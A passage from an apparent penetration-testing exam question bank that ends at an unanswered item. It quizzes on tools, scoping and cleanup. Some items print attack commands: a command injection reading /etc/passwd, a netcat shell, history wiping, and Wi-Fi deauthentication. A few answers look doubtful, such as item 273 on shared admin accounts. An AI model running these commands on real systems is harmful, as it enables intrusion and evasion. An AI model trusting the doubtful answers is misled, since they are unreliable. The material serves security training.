B.Code review
C.Black box assessment
D.White box assessment
D.White box assessment
Explanation:
White box testing allows the pentest team to have insider knowledge of organizational network assets, policies, and procedures. In many cases, this also means full access to the application code. In order to include all of the listed criteria, you would need to conduct a white box pentest.
Black box and red team assessments would exclude the code review and internal testing.
Code review does not include either external or internal application testing.
207
James has gained access to a remote machine, and one of this first things he does it create a new user account,
```
What will he achieve by doing this?
A.Privilege escalation
B.Covering of his tracks
C.Lateral movement
D.Assurance of persistence
```
D.Assurance of persistence
Explanation:
By creating a new local user account, an attacker can easily ensure persistence even after reboot or password change of the original account.
New accounts are usually easily detected, but in some cases they can remain long enough for the attacker to carry out his purpose
208
When performing an on-site pentest including Wi-Fi access points, what needs to be clearly defined in the pentest's scope?
A.Number of clients for each AP
B.Physical location of the APs being tested
C.SSID of the APs being tested
D.Wi-Fi channels of the APs being tested
C.SSID of the APs being tested
Explanation:
When conducting on-site pentests involving Wi-Fi access points (APs), it is important to have a clear understanding which APs are in the scope of the test. This will help you exclude potential out-of-scope or third-party APs.
209
```
Besides threat modeling, what could Alex use to help her determine the attack path and do a better target selection?
A.Impact analysis
B.Code review
C.Social engineering
D.Vulnerability scanning
```
A.Impact analysis
Explanation:
Performing an impact analysis (IA) and proper threat modeling can help an organization define attack paths and aid in the target selection process. The impact analysis is a key aspect of requirements management and the formal approach to assessing the pros and cons of pursuing a course of action.
210
```
What is Docker software used for?
A.Hardware virtualization
B.Host-guest based virtualization
C.Container-based virtualization
D.Cloud-based virtualization
```
C.Container-based virtualization
Explanation:
Docker is a container-based virtualization tool.
Attacks against OS-level virtualization tools like Docker often start by compromising the application that is running in the container.
211
```
How would you classify the following special requirement from a client during the planning of a pentest? They would like to exclude a network segment that contains devices with an older OS version that is known to be unstable.
A.This is a strategy requirement
B.This is a scope change
C.This is a methodology change
D.This is a technical constraint
```
D.This is a technical constraint
Explanation:
The situation is a typical technical constraint and should be discussed when planning the pentest. It does not affect the pentest's strategy or its methodology. The scope of the test is not changed either, as it is not yet defined.
212
```
Which of the following is not one of the recon-ng modules?
A.Scanning modules
B.Discovery modules
C.Reporting modules
D.Import modules
```
A.Scanning modules
Explanation:
The complete recon-ng category list of modules consists of:
Recon modules - for reconnaissance activities;
Reporting modules - for reporting results on a file;
Import modules - for importing values from a file into a database table;
Exploitation modules - for exploitation activities;
Discovery modules - for discovery activities.
213
Alex is assessing an organization's key management system and policies. The organization has delegated this responsibility to a cloud provider. In this case, how should Alex proceed with the assessment?
A.There is no need to review the clients key management system if its delegated or outsourced
B.Examine the cloud provider and its key management policies and procedures
C.The cloud provider is out of Alex's scope and should not be reviewed
D.Research the cloud provider, but do not contact it directly
B.Examine the cloud provider and its key management policies and procedures
Explanation:
In some cases, cloud providers are already certified with the necessary compliance for key management services
They could easily provide documentation to support it.
If the cloud provider is not compliant with the specific requirements, the assessment should be extended to the cloud providers key management policies and procedures
214
```
A penetration test in which the tester is provided with a network topology schema prior to the test is considered a:
A.Black Box Test
B.Red Team Assessment
C.Grey Box Test
D.White Box Test
```
C.Grey Box Test
Explanation:
Gray Box Testing is a combination of white-box testing and black-box testing. The aim of this testing is to search for the defects if any due to improper structure or improper usage of applications. The attacker would have limited knowledge of the targeted environment. Being provided with network topology could help the attacker, but at the same does not reveal too much of the infrastructure. Gray Box Testing gives the ability to test both sides of an application, presentation layer as well as the code part.
Black Box Testing is a method of software testing that examines the functionality of an application without peering into its internal structures or workings. This method of test can be applied virtually to every level of software testing: unit, integration, system and acceptance.
White Box testing is a method of software testing that tests internal structures or workings of an application, as opposed to its functionality. In White Box Testing, an internal perspective of the system, as well as programming skills, are used to design test cases. White Box Tests allow the pentester to have insider information that could aid the test process. Such information could include network firewall policies, security patches, etc.
A Red Team Assessment is similar to a penetration test in many ways but is more targeted. The goal of the Red Team Assessment is NOT to find as many vulnerabilities as possible. The goal is to test the organization's detection and response capabilities. The red team will try to get in and access sensitive information in any way possible, as quietly as possible. The Red Team Assessment emulates a malicious actor targeting attacks and looking to avoid detection, similar to an Advanced Persistent Threat (APT).
To recap:
In White Box Testing internal structure (code) is known
In Black Box Testing internal structure (code) is unknown
In Grey Box Testing internal structure (code) is partially known
215
Alex is attempting to de compile a binary file.
Unfortunately, she is unable to find a working de-compilation solution.
What are her options to get some sort of information from the binary file?
A.Run strings against the binary and analyze the output
B.Use a bugger
C.Without decompiling the code, there is no way to get anything useful from the binary
D.Run it and see the results
A.Run strings against the binary and analyze the output
Explanation:
Alex could run strings against the binary and analyze the output for possible clues. To be able to run a debugger and get meaningful results, she would need to first decompile the binary file.
216
What is the purpose of the lessons learned activity?
A.For the client to review their processes and develop more secure ones
B.For the third party observing the pentest engagement
C.For the pentesting team to review their processes and look for room for improvement
D.For both parties (client and pentester) to review the engagement process
C.For the pentesting team to review their processes and look for room for improvement
Explanation:
The lessons learned session is the team’s opportunity to get together and discuss the testing process and results without the client present. Team members should speak freely about the test and offer any suggestions they might have for improvement.
217
```
Jack has a gigantic number of IP addresses; how can he scan them all for vulnerabilities without spending a huge amount of time?
A.By using Nessus
B.By using Nmap
C.By using Wfuzz
D.By using masscan
```
A.By using Nessus
Explanation:
Nessus is a tool that allows scanning for various security issues such as network or web application vulnerabilities. It can be easily configured to run automated scans.
Masscan and Nmap are port scanners, not vulnerability scanners.
Wfuzz is a fuzzing tool, not a vulnerability scanner.
218
George is using Nmap to scan a host for open ports. He has identified port 21 to be open. In his research he has found FTP services on port 21 with known vulnerabilities and exploits. How can George check the software and its version running on his target using Nmap?
A.Using "-Pn" to disable ping
B.Using "-p" and specifying the port so that Nmap will focus on it
C,Using an -sV flag to do a service identification
D.Using -sS for a stealth scan and getting the version through the firewall
C,Using an -sV flag to do a service identification
Explanation:
Using "-sV" in George's situation would produce something like this:
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
Where "ProFTPD" is the name of the software and "1.3.5" is a vulnerable version currently running.
219
```
When attacking a Secure Shell (SSH) service, what tool could you use in attempt to gain access?
A.Nmap
B.snmpwalk
C.THC Hydra
D.Netcat
```
C.THC Hydra
Explanation:
Hydra or THC Hydra is a popular and respected network logon cracker (password cracking tool) that can support many different services. Hydra can perform rapid dictionary attacks against more than 50 Protocols, including Telnet, RDP, SSH, FTP, HTTP, HTTPS, SMB, several databases and much more.
220
```
Which of the following is a Metasploit search term?
A.CVE
B.Payload
C.Network
D.Exploit
```
A.CVE
Explanation:
Metasploit can search for exploits based on CVE.
221
```
Which of the following is not a vulnerability scanner?
A.telnet
B.Nikto
C.Acunetix
D.Nessus
```
A.telnet
Explanation:
Telnet is an application protocol used on the Internet or local area network to provide a bidirectional interactive text-oriented communication facility using a virtual terminal connection.
Nessus is a proprietary vulnerability scanner. Nikto is a free software command-line vulnerability scanner that scans web servers for dangerous files/CGIs, outdated server software and other problems. It performs generic and server type specific checks. It also captures and prints any cookies received. Acunetix is an end-to-end web security scanner that offers a 360 view of an organization's security.
222
```
What is OWASP ZAP?
A.Hacking framework
B.Intercepting proxy
C.Firefox extension
D.Metasploit module
```
B.Intercepting proxy
Explanation:
OWASP ZAP is an open-source web application security scanner. It is an intercepting proxy that serves as a great tool for security beginners and professional penetration testers. It provides tools to intercept and modify HTTP/HTTPS and WebSocket traffic, as well as an assortment of other useful tools.
223
What method does BeEF use to effectively attack web rbwosers?
A.BeEF uses a JavaScript code in hook.js
B.BeEF injects a dynamic-link library (DLL) into a browser
C.BeEF uses the meterpreter to control the browser
D.Beef uses buffer overflow methodlogy to hook the browser
A.BeEF uses a JavaScript code in hook.js
Explanation:
The Browser Exploitation Framework (BeEF) is a pentest tool that focuses on the web browser.
BeEF allows the professional pentester to assess the actual security posture of a target environment by using client side attack vectors.
Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the content of the one open door; the web browser.
BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context
BeEF uses a JavaScript code in hook.js, which when executed by a browser, gives a hook to BeEF.
With a hooked browser, similar to metasploit, you have an array of exploits in front of you.
SOme of them are viewing cookies, browser history to the more sophisticated attacks of getting a shell
224
```
Which of the following commands would you use to enumerate zone transfer?
A.nmap -sC -sV domain.name
B.host -t axfr domain.name dns-server
C.nmap -sS -D domain.name
D.dirb domain.name -r
```
B.host -t axfr domain.name dns-server
Explanation:
The host with the -t axfr switch could be used to enumerate DNS zones.
-t stands for "type" and "axfr" is used for DNS zone replication transactions.
225
George notices that the client's website allows login over HTTP. What sort of mitigation should George recommend to his client?
A.Hide the login page from being indexed by search engines
B.Use an htaccess file with another password prompt
C.Allow login only from a secure network
D.Enforce encryption using HTTPS
D.Enforce encryption using HTTPS
Explanation:
Even though sniffing passwords on the wire is less frequently useful in modern networks, encryption should be used for all authentication systems.
226
```
A complete list of targets and services to be tested is usually known as:
A.MSA
B.RoE
C.Scope
D.R&R
```
C.Scope
Explanation:
When determining the list of targets and the limits of the penetration test, this information is structured and detailed as the scope of the test. The test scope could be a separate document or part of some other document related to the pentest. Defining the scope is extremely important and should be done with care.
227
```
Which type of assessment involves stealth and blended methodologies for developing real-world scenarios of attack?
A.Hybrid
B.Vulnerability Scanning
C.Red Team
D.Black Box
```
C.Red Team
Explanation:
Red team assessment involves stealth and blended methodologies (i.e., network penetration testing and social engineering) to conduct scenarios of real-world attacks and determine how well an organization would fare with the use of the customer’s existing counter-defense and detection capabilities (i.e., what an attacker could do with a certain level of access).
228
James has gained access to a Linux host on a clients network.
He notices that the bash_history log already contains commans that could be associated with network scanning and enumeration
He suspects that this machine has been compromised by a malicious threat actor.
How should he proceed?
A.Proceed as planned
B.Retrace the attackers steps to find out how far previous compromise has gone
C.Investigate further and find more evidence
D.Inform the client of the prior compromise
D.Inform the client of the prior compromise
Explanation:
In cases where prior compromise traces are found, the pentester should stop all his activities and inform the client of the potential security risk.
James should not risk contaminating potential evidence by analyzing it himself or retracing the attackers steps
229
Elicitation is a social engineering technique and could best be described as:
A.Asking the same list of questions to multiple targeted employees in a social engineering attack and interpolating the answers
B.Guessing the output of some of your questions while at the same time getting answers to others during social engineering conversation
C.Interrogating an employee from the targeted organization with specific questions on the top of interest
D.Asking leading or open-ended questions in order to gain information on the topic of interest
D.Asking leading or open-ended questions in order to gain information on the topic of interest
Explanation:
In elicitation, one asks open-ended questions on the topic of interest, but indirectly. They leave some questions or sentences incomplete, thus inviting the target to finish by providing the relevant information.
230
Alex is writing a pentest report. She is describing an SQL injection vulnerability found during testing. She already added a screenshot of the successful exploitation that proves the result. Does she also need to explain in detail how this result was achieved?
A.A screenshot proving a successful exploit should suffice
B.No, Alex needs to keep her methods and techniques a secret to protect her intellectual property
C.Only if the client explicitly requests it
D.Yes, Alex needs to provide a full explanation and all relevant details for the client to be able to reproduce the results
D.Yes, Alex needs to provide a full explanation and all relevant details for the client to be able to reproduce the results
Explanation:
When disproving a successfully exploited vulnerability, it is imperative that the report contain a full detailed explanation of the vulnerability and the method used to exploit it. The client should be able to reproduce it in order to mitigate it.
231
Obtaining client acceptance usually involves which of the following actions?
A.A face-to-face meeting on the topic of the report
B.Receiving payment for the engagement
C.Notifying the client that the test is completed
D.Completing the post-engagement cleanup
A.A face-to-face meeting on the topic of the report
Explanation:
In most cases, a face-to-face meeting with the client and the penetration testers is held. The meeting is focused on the report results and any questions that the client or their security representatives might have.
232
In a red team engagement, James is attempting to remotely connect to a Windows machine. Instead of using RDP, he decides to use the PsExec tool. What could be his reason for choosing PsExec over RDP?
A.PsExec provides better control over the machine
B.PsExec is slient and less evident
C.PsExec would not require a password
D.RDP is less secure
B.PsExec is slient and less evident
Explanation:
In a read team engagement, one is supposed to mimic a real-world attack.
No actual attacker would prefer to use RDP, which might even cause a logout for another user.
PsExec activities can usually be found in the event logs, but other than that they are rather silent and would likely not trigger any IDS/IPS alerts, because PsExec is also regularly used by admin
233
```
You are preparing to use recon-ng for reconnaissance and have already selected the module to use. Now you need to check all the possible options that need to be configured before executing the module. Which command will show the list of options for the selected module?
A.modules options
B.options list
C.list options
D.show options
```
B.options list
Explanation:
The "options list" command is available once a plugin is selected and will provide all options related to this plugin
234
```
Which vulnerability found on a web application could potentially lead to session hijacking?
A.Stored XSS
B.SQL Injection
C.Remote File Inclusion
D.Local File Inclusion
```
A.Stored XSS
Explanation:
Stored XSS can be used by injecting code in a log file to steal and redirect a session token, which is later accessed through a web interface by an administrative user
235
Which command would be the correct one to use for sending a SYN packet to "target.com" over port 8181 and receiving a verbose output?
A.hping 8181 target.com -S
B.hping --target=target.com --packet=sync --port8181
C.hping -S -V target.com -p 8181
D.hping -s -v target.com -P 8181
C.hping -S -V target.com -p 8181
Explanation:
In this example, an hping would send SYN packets to target.com on TCP port 8181, with the result of verbose output.
236
```
When attacking a Secure Shell (SSH) service, what tool could you use in attempt to gain access?
A.Nmap
B.snmpwalk
C.THC Hydra
D.Netcat
```
C.THC Hydra
Explanation:
Hydra or THC Hydra is a popular and respected network logon cracker (password cracking tool) that can support many different services.
Hydra can perform rapid dictionary attacks against more than 50 protocols, including telnet, RDP, SSH, FTP, HTTP, HTTPS, SMB, several database and much more
237
You are looking for detailed vulnerability information, including exploitation techniques. What source of information should you check?
A.The CVE Website
B.Stack Overflow
C.SHodan
D.Full disclosure at http://seclist.org/fulldisclosure
D.Full disclosure at http://seclist.org/fulldisclosure
Explanation:
Full disclosure is a public, vendor-neutral forum for detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, and events of interest to the community.
238
James is attacking a Wi-Fi network with the following command:
aireplay-ng -0 1 -a a3:0f:83:9d:e3:ed -c 13:fd:6e:37:e0:52 wlan0
```
What will the command do?
A.Force Wi-Fi client de-authentication
B.Start a rogue access point
C.Start a man-in-the-middle attack
D.Dump Wi-Fi traffic
```
A.Force Wi-Fi client de-authentication
Explanation:
You can use aireplay-ng to deautnehtcate an existing wireless client from the network to capture the four-way handshake
-0 Deauthentication
How many deauthentications to send to the wireless client?
- a MAC of the target AP
- C MAC of the target wireless client
Your wireless interface name
239
What is this command used for:
cat /dev/null > ~/.bash_history
A.Building a dictionary
B.Read file contents
C.Reading all users' bash_history files
D.Clearing tracks
D.Clearing tracks
240
```
For what sort of pentest is the sample application request documentation usually helpful?
A.PCI assessments
B.Web-based pentests
C.Vulnerability scanning
D.Network pentests
```
B.Web-based pentests
Explanation:
Things like sample application requests are usually part of a web application development and would be helpful in a web-based pentest. An example of a sample request could be a list of API calls compiled by developers.
241
```
A man-in-the-middle attack could be achieved using which of the following?
A.Arpsoof
B.Burp Suite
C.Nikto
D.Nessus
```
A.Arpsoof
Explanation:
Arpspoof is a tool regularly used in man-in-the-middle attacks. The tool floods the MAC tables of a target with spoofed ARP responses for the MAC address of the network route or gateway.
242
How can Jack improve the efficiency of a vulnerability scanner?
A.Its better to not do anything else, since scanners need a lot of memory to operate
B.By using another vulnerability scanner software
C.By using specific plugins
D.By running the scan again in case it missed something
C.By using specific plugins
Explanation:
There are plugins designed to enhance scanning techniques and also the range of vulnerabilities, thus simplifying the process of scanning. Each plugin consists of a list of known vulnerabilities and different techniques for testing them.
Using another vulnerability scanner software would increase time, traffic and the chance for mistakes.
Running the scan again is a useless procedure.
Not doing anything else is incorrect because there are ways to improve performance.
243
```
Which Windows feature supports PowerShell remote command execution?
A.Nc
B.PowerSploit
C.Empire
D.WinRM
```
D.WinRM
Explanation:
Once enabled, WIndows Remote Management (WinRM) can allow remote PS command execution, usually associated with administrative work
Nc (netcat) is not a Windows feature but a single tool.
Empire is a pivoting and privilege escalation framework.
PowerSploit is a PowerShell exploitation framework
244
```
What scan methods would be better suited for the vulnerability scan if the targeted organization's security team is not aware of the pentest?
A.Scan through proxy
B.ICMP Sweep
C.OS FIngerprinting scan
D.Stealth scan
```
D.Stealth scan
Explanation:
When the targeted organization's security team is not aware of the pentest being carried out, it makes more sense to avoid detection and imitate a real attack vector.
245
```
James exploits known Bluetooth vulnerability in order to gain contacts, emails, and other data from the targeted mobile device. What attack is being described?
A.Jamming
B.SSL Stripping
C.Bluesnarfing
D.Bluebugging
```
C.Bluesnarfing
Explanation:
Bluesnarfing is the process of exploiting vulnerabilities found in certain Bluetooth firmware in order to steal information from a wireless device. With successful attacks, one can steal contacts, calendar info, email, and text messages when the Bluetooth device is turned on and set to discoverable mode.
246
Which of the following sqlmap commands is incorrect and will not work?
A.sqlmap.py --host "https://example.com/article.php?id=16" --dbms=MYSQL
B.sqlmap.py -u "https://example.com/article.php?id=16" --dbms=MYSQL --level=3 --risk=3
C.sqlmap.py -u "https://example.com/article.php?id=16"
D.sqlmap.py -u "https://exmaple.com/article.php?id=16"--dbms=MYSQL
A.sqlmap.py --host "https://example.com/article.php?id=16" --dbms=MYSQL
Explanation:
When running sqlmap command, you would need to most importantly provide it with a target or a URL to use. The proper flag for this is "-u". --host is also legitimate flag, but is used to specify the HTTP Host header value.
247
```
What does WMI stand for?
A.Windows Management Instrumentation
B.Windows Mock Interceptor
C.WIndows Movement Internal
D.WIndows Metasploitable Infrastructure
```
A.Windows Management Instrumentation
Explanation:
Windows Management Instrumentation, or WMI, provides access to a wide variety of information and commands. It can be used to obtain Application Inventory listings or to enable remote command execution or file transfers.
248
```
Through fuzzing, James is entering multiple different strings and combinations of letters, digits and symbols into the search bar on a web application. What type of exploitation is he attempting?
A.HTTP parameter pollution
B.Cross-site scripting
C.Man-in-the-middle attack
D.Downgrading
```
A.HTTP parameter pollution
Explanation:
HTTP parameters are assigned and typically managed and processed by the web application server. HTTP parameter pollution (HPP) involves entering arbitrary values into web parameters in an effort to cause unexpected behavior that could lead to either client- or server-side weakness, such as HTML injection or command injection.
249
Alex has obtained shell access to a Linux server. She has limited access and she would like to elevate her privileges. One of the commands she uses is:
find / -perm –u=s –type f –exec ls –al {} \; 2>/dev/null
What results will this command provide?
A.It will cause kernel panic, which could be used to elevate privileges
B.It will locate all setuid executable files on a Lunix/Unix host
C.It will test kernel exploits for privilege escalation
D.It will attempt to crack the root password
B.It will locate all setuid executable files on a Lunix/Unix host
Explanation:
The command will traverse through the file systems, starting with the root partition and look for files that have the setuid bit applied that the account user has read access to.
Once the file located, the -exec option executes a long listing formatted with ls -al for each file that is returned
STDERR (standard error) is discarded and redirected to /dev/null
250
Jacob is tasked with performing an ARP spoofing attack. What condition needs to be fulfilled in order for him to successfully complete this attack?
A.Jacob will need to be inside of the broadcast domain of a targeted system
B.Jacob will need a Windows machine as ARP SPoofing only against Windows machines
C.Jacob will need a Linux machine as ARP spoofing only works against Linux machines
D.Jacob will need to have two or more network adapters
A.Jacob will need to be inside of the broadcast domain of a targeted system
Explanation:
ARP Spoofing is a type of attack in which a malicious actor sends falsified ARP (Address Resolution Protocol) messages over a local area network.
This results in the linking of an attackers MAC address with the IP address of a legitimate computer or server on the network
Once the attackers MAC address is connected to an authentic IP address, the attacker will begin receiving any data that is intended for that IP address.
ARP spoofing can enable malicious parties to intercept, modify or even stop data in-transit. ARP spoofing attacks can only occur on local area networks that utilize the Address Resolution Protocol.
ARP spoofing attacks are often used to facilitate other attacks such as:
Denial-of-service attacks
Session hijacking
Man-in-the-middle attacks
251
```
When outlining a mitigation strategy for her client, what else should Alex consider as potential room for improvement, apart from technology and people?
A.Teams
B.Management
C.Vulnerability scans
D.Processes
```
D.Processes
Explanation:
Apart from improving the technology and training employees, Alex could also suggest process improvements that could result in a better security posture for her client.
252
```
You are preparing to use recon-ng for reconnaissance and have already selected the module to use. Now you need to check all the possible options that need to be configured before executing the module. Which command will show the list of options for the selected module?
A.modules options
B.options list
C.list options
D.show options
```
B.options list
Explanation:
The "options list" command is available once a plugin is selected and will provide all options related to this plugin (i.e., source of input).
253
```
Which of the following techniques is not a social engineering attack?
A.Man-in-the-middle
B.Elicitation
C.Spear Phishing
D.Whaling
```
A.Man-in-the-middle
Explanation:
Man-in-the-middle is an attack that allows the attacker to position himself in the middle of the traffic between two entities. Thus is has nothing to do with social engineering.
254
Jack is hacking a wireless network for one of his clients. He is attempting to capture the WPA PSK 4-way handshake and use it to crack the password with Aircrack-ng. What could Jack do to increase his chances of capturing the authentication handshake?
A.He should try using Karmetasploit to capture the requests
B.There is no way to capture the 4-way handshake without being on the network
C.He needs to start sniffing Wi-Fi before the employees get to work, so he can capture the authentication when they are connecting
D.He can use Airplay-ng to force Wi-Fi clients to de-authenticate and then re-authenticate
D.He can use Airplay-ng to force Wi-Fi clients to de-authenticate and then re-authenticate
Explanation:
Aireplay-ng is part of the Aircrack-ng suite and provides the functionality to craft a packet in way that will de-authenticate the targeted machine. The correct command is as follows:
Aireplay-ng -0 1 -a -c
-0 flag stands for de-authentication
1 is the number of packets to be sent
- a is the MAC of the targeted AP
- c is the MAC of the targeted client
255
George has successfully logged in on a compromised Linux machine. He is greeted with a restricted shell. What could he try in order to upgrade to full shell access?
A.Try to elevate his privileges by using local file inclusion
B.Brute-force admin credentials
C.Check what commands he can run and focus on SUID commands
D.Log in to the server on a different port
C.Check what commands he can run and focus on SUID commands
Explanation:
When greeted with a restricted shell, a pentester can try the following techniques:
■ Check the commands you can run, particularly looking for SUID commands.
■ Check to see if you can use sudo and what sudo commands you can execute.
■ Check for languages like Perl, Python, or Ruby that you can run.
■ Check to see if you can use redirect operators like | or > and escape characters like single quotes, double quotes, or other execution tags.
256
```
Alex is performing a network scan against a subnet of Windows servers. One of the machines reported port 445 to be open. What service is listening on port 445?
A.WIndows mail server
B.Windows Remote Desktop Service
C.WIndows SMB Share
D.WIndows Database Server
```
C.WIndows SMB Share
Explanation:The Windows Server Message Block (SMB) protocol is a network file sharing protocol that allows applications on a computer to read and write to files and to request services from server programs in a computer network. The SMB protocol can be used on top of its TCP/IP protocol or other network protocols. Windows SMB shares are usually using port 445. There are many exploits and attacking methods against port 445.
257
```
If a host is configured not to reply to ICMP echo requests or such requests are not routed in a network you are currently scanning, what Nmap flag will you use to make sure that the host is considered alive, even though it does not respond to ping?
A.-Pn
B.-A
C.-sS
D.-sN
```
A.-Pn
Explanation:
Nmap flags are the parameters we use after calling the program, for example -Pn (no ping) is the flag or parameter to prevent Nmap from pinging targets. The Nmap flag used to treat all hosts as online is -Pn.
258
During Nmap fingerprinting, Lisa has identified one machine running a service called "vsftpd". It appears the current version is 2.3.4. Being tasked to gain access to as many hosts as possible, what should Lisa's next step be?
A.USe searchsploit in attempt to find an exploit for the current version of "vsftpd"
B.Download the FTP software locally and look for vulnerabilities manually
C.Conduct a MiTM attack to attempt to capture FTP credentials
D.Try to brute-force the lgoin credentials for the FTP
A.USe searchsploit in attempt to find an exploit for the current version of "vsftpd"
Explanation:
Lisa should utilize all known exploit databases, such as exploit-db, metasploit, etc. in order to find a possible exploit for the current vsftp version.
259
What exploitation technique is being attempted with the following command?
curl https://example.com/news.php?article=“;cat%20%2Fetc%2Fpasswd
A.Directory Traversal
B.HTML Injection
C.COmmand Injection
D.SQL Injection
C.COmmand Injection
Explanation:
The "curl" command is used against a targeted website with a vulnerable “article” parameter. The command is URL-encoded and when decoded looks like this:
cat /etc/passwd
The output should display the contents of the /etc/passwd file on the machine.
260
```
An employee downloads cracked software from a torrent tracker site. The software works as expected, but in order to bypass licensing it needs to be executed from a "cracked" executable. This cracked executable has two functions: it runs the software license-free and also provides remote access to the machine it is running on. How would you categorize this software?
A.A code injection tool
B.A worm
C.A trojan horse
D.A man-in-the-middle tool
```
C.A trojan horse
Explanation:
A Trojan horse is disguised as legitimate software or a tool that serves a specific purpose, but it also has hidden functionality, usually providing back-door access or remote control to malicious attackers.
261
Which are the three main goals of information security?
A.Cryptography, FIrewalls, AV
B.Confidentiality, Integrity, Availability
C.Security, Protection, Transparency
D.Disclosure, ALteration, Denial
B.Confidentiality, Integrity, Availability
Explanation:
The CIA triad is a model that shows the three main goals needed to achieve information security. While a wide variety of factors determine the security situation of information systems and networks, some factors stand out as the most significant. The assumption is that there are some factors that will always be important in information security. These factors are the goals of the CIA triad, as follows:
Confidentiality - preventing unauthorized access to information or systems
Integrity - preventing unauthorized changes and modifications of information or systems
Availability - ensure that use or access to systems and information remains possible
Confidentiality, integrity and availability are the concepts most basic to information security. These concepts in the CIA triad must always be part of the core objectives of information security efforts.
262
What remediation technique would best fit the following scenario?
In the search function of a website, Alex is adding " ' " (quote) to the search criteria, and the application is producing an SQL error. This could potentially be exploited to an SQL injection.
A.The client should change the back-end DB to a NoSQL database
B.The client should blacklist the "'" (quote) character on the website
C.The client should make sure that the database is hosted on a different server
D.The client should sanitize user input or use parameterized queries
D.The client should sanitize user input or use parameterized queries
Explanation:
Even though blacklisting a specific character might resolve the issue on the surface, blacklisting is not a solution. Best practices in this situation suggest sanitation of user input and usage of parameterized queries when possible.
263
Why would an Nmap syn scan (-sS) produce more results than an Nmap full connect scan (-sT)?
A.A syn scan is compatible with all operating systems, unlike a full connect scan
B.A full connect scan takes longer and some hosts drop the requests
C.A syn scan uses ICMP echo requests to find hosts
D.A syn scan can work through most firewalls
D.A syn scan can work through most firewalls
Explanation:
Firewalls tend to allow "syn" packets to pass through, assuming they are part of a live connection, while a full connect scan attempts to initiate a new connection and is recognized by firewalls.
264
What information could be found with a whois query against a domain?
A.Whois database could contain information about the domain owner
B.Whois lists all servers hosting this domain
C.Whois returns all domains owned by the same owner
D.Whois will list all open ports on the server hosting the domain
A.Whois database could contain information about the domain owner
Explanation:
Even though there are many online services that provide whois anonymity, some useful information could be extracted from the Whois database. It could contain information about the domain owner, contact details and addresses as well as dns servers.
265
During the post-engagement cleanup, George is removing all his shells and other files. How should he handle the rogue users that were created in the process of compromising the machine?
A.Leave the users as a POC
B>Remove all rogue users
C.Lock the user accounts with strong passwords
D.Suggest that the machine be completely re-imaged
B>Remove all rogue users
Explanation:
The post-engagement cleanup involves removing shells and tester-created credentials, and possibly removing tools from local or remote file shares. In some cases, the client may need to reboot target hosts in order to clear the contents of memory, even if nothing was written to disk. The pentester should also remove all users and accounts created for the purpose of the pentest.
266
During a pentest, James exploited a vulnerability that has led him to shell access. Immediately after gaining shell access, James mitigated the original vulnerability and left only his own shell backdoor. At a later stage in the post-engagement cleanup, in what condition should he leave the machine?
A.He should neither change the machines state nor inform the client as all the information is in the report
B>He should restore the machine to its original state: remove his backdoor but enable the vulnerability
C.He should not change anything on the machine and simply inform the client of the current state
D.He should remove his backdoor but leave the temporary mitigation and inform the client of the current situation
D.He should remove his backdoor but leave the temporary mitigation and inform the client of the current situation
Explanation:
In general, testers should remove their changes and restore the system to its original state. The exception to this rule is that testers may have made emergency changes to assist with the remediation of critical vulnerabilities. If this occurred, testers should coordinate with management and determine appropriate actions.
267
When planning an external pentest, determining the budget is very important. What is the first metric that is taken into consideration when calculating the estimate?
A.Estimated number of hours
B.Price of the clients shares
C.Price of the software that will be used
D.Price of hardware that will be used
A.Estimated number of hours
Explanation:
For an external or commercial pentest, budget determination normally begins with estimating the number of hours the testing will take, based on the complexity of the test.
268
What is the following command attempting to achieve:
./sqlmap.py -u "https://example.com/article&id=1" --technique=U
A.UNION-based SQL injection
B.User enumeration against SQL database
C.Brute-forcing of SQL database users
D.Blind-based SQL injection
A.UNION-based SQL injection
Explanation:
Sqlmap is a python-based database scanning and exploitation tool. The above command provides the targeted url using "-u" and the type of the injection attack using "--technique=U" where "U" stands for UNION.
269
How should James categorize the following finding: The password used to log in to a web server was easily brute-forced as it was only six characters in length.
A.As a critical vulnerability
B.As an informational finding of a short password
C.As a low-risk vulnerability
D.As a significant finding of weak password complexity
D.As a significant finding of weak password complexity
Explanation:
Password length and complexity should adhere to security best practices and standards. Password complexity standards often change to increase the complexity level. Previously, it may have been okay to have a password containing only letters, but these days passwords should include lower and uppercase letters, numerals, and symbols.
270
```
Testing multiple password variations to obtain the admin username on a website is essentially:
A.Credential harvesting
B.Brute-forcing
C.Pass the hash
D.Dictionary attack
```
B.Brute-forcing
Explanation:
Brute-force password attacks are very inefficient and are typically a last resort. However, tools like John the Ripper (JTR), Cain and Abel, and Hashcat help increase the chances of successful password exploitation. JTR can conduct both dictionary and brute-force password attacks against common hashing algorithms.
271
```
James is looking for a local proxy tool. It needs to be rich with functions and completely free. What would be his best option?
A.BeEF
B.SET
C.OpenVAS
D.OWASP ZAP
```
D.OWASP ZAP
Explanation:
He can use the OWASP Zed Attack Proxy (ZAP), which is a free and popular application testing framework, to assess the vulnerable application. ZAP is included in Kali Linux. Web application testing is a critical skill for a pentester.
272
Under what circumstances is it acceptable for Alex to keep her malicious account on a targeted system?
A.The acocunt is needed as a POC for successful compromise of the machine
B.Only if the account is local and could not be exploited externally
C.If a retest is scheduled and the account could be used again
D.There is no reason to keep the account on the system unless explicity requested by the client
D.There is no reason to keep the account on the system unless explicity requested by the client
Explanation:
Usually as part of the post-engagement activities, penetration testers clear all exploitation tools and changes made. Leaving such an account could pose a great risk, and it should only remain if the client has explicitly requested it.
273
John has noticed that an administrative team in the client company is using a shared account. What is a mitigation suggestion that John should include in his report?
A.Using a shared administrative account is fine; as long as all users are administrators there is no risk
B.This account should be used only in emergency situations and should have extreme password complexity to prevent possible compromise
C.The team processes need to be updated and each team member should use their own administrative account to assure accountability and limit the risk of compromise
D.People using this account should undergo security training to help them protect it
B.This account should be used only in emergency situations and should have extreme password complexity to prevent possible compromise
Explanation:
No employee should know the password of this account, and it should only be accessed in emergency situations. The password should be stored securely and should be changed once it is used.
274
George is attempting to crack offline password hashes he managed to gain during his pentest. He plans to use a precomputed list of passwords in order to speed up the process. What type of password cracking attack is he attempting?
A.Pass the hash
B.,Dictionary attack
C.Brute-force
D.Rainbow tables
D.Rainbow tables
Explanation:
Rainbow tables contain precomputed hash values of a defined length that can be used to speed up the process of offline password cracking.
275
What is this command used for?
nc -e cmd.exe
A.To send a file from Windows host
B.To create a reverse shell on a WIndows host
C.TO disable cmd.exe in a remote Windows host
D.To bind a shell to Windows
